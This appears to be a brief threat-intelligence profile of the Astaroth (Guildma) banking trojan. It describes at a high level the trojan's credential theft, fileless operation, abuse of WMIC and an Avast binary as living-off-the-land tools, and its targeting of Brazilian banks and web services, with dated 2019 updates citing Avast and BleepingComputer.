Astaroth is a trojan and information stealer of sensitive information such as user credentials using a key logger module, operating system calls interception, and clipboard monitoring. It is used in a fileless malware campaign in the memory of infected computers. Astaroth also abuses living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Command-line (WMIC) to steathily download and install malware payloads in the background.
July 2019: Researchers believe the banking trojan called Guildma, and Astaroth are the same malware. Both use Avast binary aswrundll.exe as a LOLBin. Guildma is a complex malware that is a combination of spyware, RAT, password stealer, and banking malware. Until recent reports, the malware appeared to stay within Brazil. Guildma/Astaroth has been observed targeting approximately 130 banks and web services such as, Netflix, Amazon, and Google Mail, although currently not exploiting computers using the English language. (Avast)
September 2019: Astaroth Trojan uses Cloudflare workers to bypass AV software. (Bleeping Computer)
BleepingComputer provides technical details and indicators of compromise on recent Astaroth activity, available here.